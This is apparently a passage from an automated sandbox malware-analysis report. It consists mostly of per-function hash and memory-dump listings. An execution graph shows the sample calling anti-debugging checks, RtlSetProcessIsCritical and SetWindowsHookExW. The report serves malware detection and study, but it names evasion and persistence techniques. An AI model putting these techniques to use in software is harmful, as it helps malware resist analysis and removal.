                                                                                          • Instruction Fuzzy Hash: 2C313A78710209CFD345BB68E89D66E3BA2FBD9304F604029D90297385DF38AE058FD2
                                                                                          Function 062817FF Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e1bf8a14c086748f293a1408ecc3c9c7e2d900b4c9146cf884dce4fbb5f88c39
                                                                                          • Instruction ID: d6a824dd0ef2e443b16d66752d34bae85d3a212ad41fb4fac08648af138e910f
                                                                                          • Opcode Fuzzy Hash: e1bf8a14c086748f293a1408ecc3c9c7e2d900b4c9146cf884dce4fbb5f88c39
                                                                                          • Instruction Fuzzy Hash: A6014F74A103198FD764DF28D88969A7BF6FF85300F0080E8A819E3245EB359E45DF15
                                                                                          Function 0628FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd24bb6408fb77ad816b4575ed1ca287502fdfc391dc4ff9327f991b0f29471f
                                                                                          • Instruction ID: 125581ede66a37289746cd8d08d518e4c7d0129cb15cde29a55e3d961fb96a7c
                                                                                          • Opcode Fuzzy Hash: bd24bb6408fb77ad816b4575ed1ca287502fdfc391dc4ff9327f991b0f29471f
                                                                                          • Instruction Fuzzy Hash: A6F0F9383242058BD754BA68FDAD6263B66FB99781B404028EC028A6D5DE28ED01CB96
                                                                                          Function 06280ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1b1ec06729f9e456a8cdd04b17dba46a5517c8905a50a2feafb866bd1b4945f7
                                                                                          • Instruction ID: 86b38e591eeb73141f04da8fcdc7b657412ee8b84684756c8b3e2b06a8d52808
                                                                                          • Opcode Fuzzy Hash: 1b1ec06729f9e456a8cdd04b17dba46a5517c8905a50a2feafb866bd1b4945f7
                                                                                          • Instruction Fuzzy Hash: C2F01774A21228CFE7A0EF58DC8879A7BB1FB45301F104095E91AE3285DB319E89CF52
                                                                                          Function 0628504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d94f1fd5dfa88c174f70481d93a22f3f78fab093c3db5b5fd92c6fff3b098c72
                                                                                          • Instruction ID: 1598efe618ce68cca3c9600d1ec47ad97dbfd65cfcd11d62f17ece5972fcef00
                                                                                          • Opcode Fuzzy Hash: d94f1fd5dfa88c174f70481d93a22f3f78fab093c3db5b5fd92c6fff3b098c72
                                                                                          • Instruction Fuzzy Hash: 90E0C974A1021CCFD794DF18D88979DBBB1FB44300F1080D5A919A3380DB306E89CF51
                                                                                          Function 06285043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d94f1fd5dfa88c174f70481d93a22f3f78fab093c3db5b5fd92c6fff3b098c72
                                                                                          • Instruction ID: 1598efe618ce68cca3c9600d1ec47ad97dbfd65cfcd11d62f17ece5972fcef00
                                                                                          • Opcode Fuzzy Hash: d94f1fd5dfa88c174f70481d93a22f3f78fab093c3db5b5fd92c6fff3b098c72
                                                                                          • Instruction Fuzzy Hash: 90E0C974A1021CCFD794DF18D88979DBBB1FB44300F1080D5A919A3380DB306E89CF51
                                                                                          Function 06287D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d71cacce0f858b9b08d1a98d7d531ebeaf5e48e9f2033fb2e70401d45e54f7fd
                                                                                          • Instruction ID: d3f47c4f0ba1c7eed443d472284e862920a6806301294d8ef412ebfee20a1a18
                                                                                          • Opcode Fuzzy Hash: d71cacce0f858b9b08d1a98d7d531ebeaf5e48e9f2033fb2e70401d45e54f7fd
                                                                                          • Instruction Fuzzy Hash: B8D0527280120CEBCB00EFE4990449EBBF8EB49210B2048A69908D3210EE32AE04AF81
                                                                                          Function 06285134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 82a578fa6305cd32571e14cd1df889d7c42af6b991f88fe11fe23fbf9cf46b80
                                                                                          • Instruction ID: 9a3c48985496b5892857d44428421fb3321fce6effb0c8f5b83bbbec746014eb
                                                                                          • Opcode Fuzzy Hash: 82a578fa6305cd32571e14cd1df889d7c42af6b991f88fe11fe23fbf9cf46b80
                                                                                          • Instruction Fuzzy Hash: 70D067B4A102148FDBA49F68E89869D76B1AB48201F1084AA960AE3288DF304F85CF24
                                                                                          Function 0628BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 06284B0B Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe7a9fb969c3eb1496e58fac5fff2b26ffe66b659351c36dddc41484e7073c48
                                                                                          • Instruction ID: 8158a71245b925f92d3708c07abf4fcf7350a72217f7b5671725eccde8b27165
                                                                                          • Opcode Fuzzy Hash: fe7a9fb969c3eb1496e58fac5fff2b26ffe66b659351c36dddc41484e7073c48
                                                                                          • Instruction Fuzzy Hash: 6CC0C9748256558EEB806B68C16538AB7A4FB50300B4000F29C298A116CA7446059B82
                                                                                          Function 062886F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 06288780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ca68130dbc0fe7df2f6cbd08cf44a7b423d963cc1ee73d3693226bcb467b0b6
                                                                                          • Instruction ID: d45b4276c3d9d73b8522ed91c4ceee6d449521a6169578b73b8b37612b4ed095
                                                                                          • Opcode Fuzzy Hash: 2ca68130dbc0fe7df2f6cbd08cf44a7b423d963cc1ee73d3693226bcb467b0b6
                                                                                          • Instruction Fuzzy Hash: F7C02B3021010CC3D305365CF45C05A338EE3C9B04F410010D50543341CD24BF018B93
                                                                                          Function 06288760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 06281A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9b17eb81aedd4c734d2109ff276dd8eef3edefe248cf40c794e25ae0a49b158
                                                                                          • Instruction ID: f4b19aee3e22d1626c3f233fa9a12bfaee50d37cf6c6b82a5718111ceb21f482
                                                                                          • Opcode Fuzzy Hash: d9b17eb81aedd4c734d2109ff276dd8eef3edefe248cf40c794e25ae0a49b158
                                                                                          • Instruction Fuzzy Hash: 85C00274A153148FDB645BB8A41C29D7AA1AB48351F000466A84BC2389DB344B41CF65
                                                                                          Function 062876A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 062887F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 06287310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d18ff176298a6d83f21a2f7405cd0359e713d5176f149eef2d391b6c25f015d4
                                                                                          • Instruction ID: 3ee4057982a47a9b570c15c1ccdf1d6b0044bbda0afb7c271747173698ed06a4
                                                                                          • Opcode Fuzzy Hash: d18ff176298a6d83f21a2f7405cd0359e713d5176f149eef2d391b6c25f015d4
                                                                                          • Instruction Fuzzy Hash: 1EA02230002B0CC3820032B02000220B38C8888008B8000BC820C0CA220A33E8A08088
                                                                                          Function 06287680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3bc8813938afab0357cd231dd6f0553c14ce4019903e70bb194045ee5f146e00
                                                                                          • Instruction ID: 9be930d0c7c9ad83452cffbebf84acd904011780677aa4eb6b85cd7c80210bb1
                                                                                          • Opcode Fuzzy Hash: 3bc8813938afab0357cd231dd6f0553c14ce4019903e70bb194045ee5f146e00
                                                                                          • Instruction Fuzzy Hash: 45A0243003170CC7C30017F0700D4107F5CD5001153400074F50C00511DF33F010CD50
                                                                                          Function 06287A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87b399f941d336cfe109e07279212884c1145cc0ae64010404687f6c60834537
                                                                                          • Instruction ID: c2fdd32b0b43417e5aeae61567562f686c67fd742ec6a9e725da83ca8e5fce18
                                                                                          • Opcode Fuzzy Hash: 87b399f941d336cfe109e07279212884c1145cc0ae64010404687f6c60834537
                                                                                          • Instruction Fuzzy Hash: F990023108460C8B4650279D740969E775CA54555D7940051E50D515095B5965114AA5
                                                                                          Function 06281A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d1ccbc1ee502bba06986e5b80ba131b7e79c04e1c778a4c396d3452fd07d9047
                                                                                          • Instruction ID: a65ddc26423e1356141464e7b7766e0c894074d5d06de67e06c0bac62bf9bd83
                                                                                          • Opcode Fuzzy Hash: d1ccbc1ee502bba06986e5b80ba131b7e79c04e1c778a4c396d3452fd07d9047
                                                                                          • Instruction Fuzzy Hash: 26B01230110214CFD7505A04CD082993221A740301F0001506402911848B700D44CF10

                                                                                          Non-executed Functions

                                                                                          Function 031C0C60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: adadab181387a2ffdfbe06e28c13ec45130bc0a45250d5e315ba7b6bc14c6cd1
                                                                                          • Instruction ID: 258bdfcfaadd4bfc40d78ea81b3e3529c85d409d164952c27cf50963d3bef147
                                                                                          • Opcode Fuzzy Hash: adadab181387a2ffdfbe06e28c13ec45130bc0a45250d5e315ba7b6bc14c6cd1
                                                                                          • Instruction Fuzzy Hash: EF7106B5B002458FD748DF6EE88869EBBB2FFC8300B14C569D404AB268EF345A05DF52
                                                                                          Function 031CEF90 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: 23bb92adc7fd30d7e5aa2ba10e8ce36aa4fb8c141b007f7428b00b5d64f8153d
                                                                                          • Instruction ID: 68294e5933e60caf5d5b4ade9c9a1ef2fc886dcd3736ed58c3bb41d5c27622fb
                                                                                          • Opcode Fuzzy Hash: 23bb92adc7fd30d7e5aa2ba10e8ce36aa4fb8c141b007f7428b00b5d64f8153d
                                                                                          • Instruction Fuzzy Hash: 307128B4A006058BD718EF7EE88469EBBF3FFC9300B10D569D404AB268DF745906DB52
                                                                                          Function 031C0C70 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq
                                                                                          • API String ID: 0-751858264
                                                                                          • Opcode ID: 448b623d2a7600d171428412be08c1b7a1caee3bc759054b924d4152dba6571a
                                                                                          • Instruction ID: 7f7cc98729741e5b184a7e21f93cb049b3b68793292b919c70709cfcd9bacf68
                                                                                          • Opcode Fuzzy Hash: 448b623d2a7600d171428412be08c1b7a1caee3bc759054b924d4152dba6571a
                                                                                          • Instruction Fuzzy Hash: 4271F5B5B006458FD748DF6EE88869EBBB2FFC8300B14D529D404AB268EF345A05DF52
                                                                                          Function 061C1870 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \VVm
                                                                                          • API String ID: 0-390912563
                                                                                          • Opcode ID: b1ed8644e2cde71751569c7b4a70d941a84ed23ebbbc6ebf6a4215374db13682
                                                                                          • Instruction ID: d3993c0a6dba152d98050d2d5810bc2c34865a1ed914150487faf9fc7c949ee8
                                                                                          • Opcode Fuzzy Hash: b1ed8644e2cde71751569c7b4a70d941a84ed23ebbbc6ebf6a4215374db13682
                                                                                          • Instruction Fuzzy Hash: 43917C70E00249AFDF54CFA8C9927EEBBF2AF98324F14852DE405A7255EB749845CF81
                                                                                          Function 0628F400 Relevance: .4, Instructions: 371COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f4f057cceb04b3f05871c7d67b5fd0e34fc1771114456471ec77e9f851a041e
                                                                                          • Instruction ID: 3a316ae38f22fab831b30a90375f618719d5dc6570ea19f32fb117322662ab1f
                                                                                          • Opcode Fuzzy Hash: 4f4f057cceb04b3f05871c7d67b5fd0e34fc1771114456471ec77e9f851a041e
                                                                                          • Instruction Fuzzy Hash: F3D1AF71E111698FCB41DFA8C9805ADFBF1FF48340F148669D865FB24AD734A946CB90
                                                                                          Function 031CD3E8 Relevance: .4, Instructions: 354COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 443f5f6fe3b5caeaa93f4919617908d67b97eb73a3b56f4a9c30ae5217b45bd1
                                                                                          • Instruction ID: f3df142592ed5d916d88683831954fdc39fb37cb59c2c19ae97d414aec7dd4cf
                                                                                          • Opcode Fuzzy Hash: 443f5f6fe3b5caeaa93f4919617908d67b97eb73a3b56f4a9c30ae5217b45bd1
                                                                                          • Instruction Fuzzy Hash: D6C189B1E102698BCB11CF98D8806EDFBF1FF48304F298669D454BB20AD734A946CF90

                                                                                          Execution Graph

                                                                                          Execution Coverage:16.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:34
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 13099 11c1978 13100 11c20bf 13099->13100 13101 11c19a1 13099->13101 13105 11c25e8 13101->13105 13111 11c2598 13101->13111 13102 11c1b17 13106 11c25a6 13105->13106 13107 11c25f6 13105->13107 13108 11c25bb 13106->13108 13116 11cb3c8 13106->13116 13121 11cb5d0 13106->13121 13108->13102 13113 11c25a6 13111->13113 13112 11c25bb 13112->13102 13113->13112 13114 11cb3c8 CheckRemoteDebuggerPresent 13113->13114 13115 11cb5d0 CheckRemoteDebuggerPresent 13113->13115 13114->13112 13115->13112 13117 11cb3d7 13116->13117 13117->13108 13118 11cb3f8 13117->13118 13125 11c69dc 13117->13125 13118->13108 13122 11cb5ee 13121->13122 13123 11c69dc CheckRemoteDebuggerPresent 13122->13123 13124 11cb601 13123->13124 13124->13108 13126 11cb638 CheckRemoteDebuggerPresent 13125->13126 13128 11cb601 13126->13128 13128->13108 13136 11c1ae6 13137 11c1aee 13136->13137 13139 11c2598 CheckRemoteDebuggerPresent 13137->13139 13140 11c25e8 CheckRemoteDebuggerPresent 13137->13140 13138 11c1b17 13139->13138 13140->13138 13129 11cfc50 13130 11cfc94 RtlSetProcessIsCritical 13129->13130 13131 11cfcf1 13130->13131 13132 11cfdf0 13133 11cfe34 SetWindowsHookExW 13132->13133 13135 11cfe7a 13133->13135

                                                                                          Executed Functions

                                                                                          Function 011CB630 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011CB6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: e1f51cc3fbf8a8f4bda6d578e16191b44018a2ff1b19c88af3bd150e98d1c9f5
                                                                                          • Instruction ID: e3510c1a89137ac21d9ffd69d33c0ce89a9254cf2a8af1c0bab09b78a7c76470
                                                                                          • Opcode Fuzzy Hash: e1f51cc3fbf8a8f4bda6d578e16191b44018a2ff1b19c88af3bd150e98d1c9f5
                                                                                          • Instruction Fuzzy Hash: 262166B1C002598FDB10CFAAC585BEEBBF5AF58310F28845AE859A3350D3789944CF60
                                                                                          Function 011C69DC Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011CB6AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 9f684fd613b3af0438223414190fec22959f571cf0e3dc9645c8b40dda06f923
                                                                                          • Instruction ID: f5516e95f949d3c69ff40b2ea4d4ca567e665b2c3cf5120156ea3f9f30eccc46
                                                                                          • Opcode Fuzzy Hash: 9f684fd613b3af0438223414190fec22959f571cf0e3dc9645c8b40dda06f923
                                                                                          • Instruction Fuzzy Hash: C72166B1805219CFDB14CF9AC885BEEBBF4EF58320F14845AE459A7340D778A944CFA5
                                                                                          Function 011CFC48 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 011CFCE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 3a31e549cc0a13d0932def565c2fea4372f2fc7e0df495d7a23c413da894a46e
                                                                                          • Instruction ID: 7027075027296f7a5683dfa0931e088c8e1075eeec4078c581adf2a0c5518f84
                                                                                          • Opcode Fuzzy Hash: 3a31e549cc0a13d0932def565c2fea4372f2fc7e0df495d7a23c413da894a46e
                                                                                          • Instruction Fuzzy Hash: FB214AB6901259CFDB14CF9AD480BEEBFF4AF58311F14805AE955A3640C3789944DF61
                                                                                          Function 011CFC50 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 011CFCE2
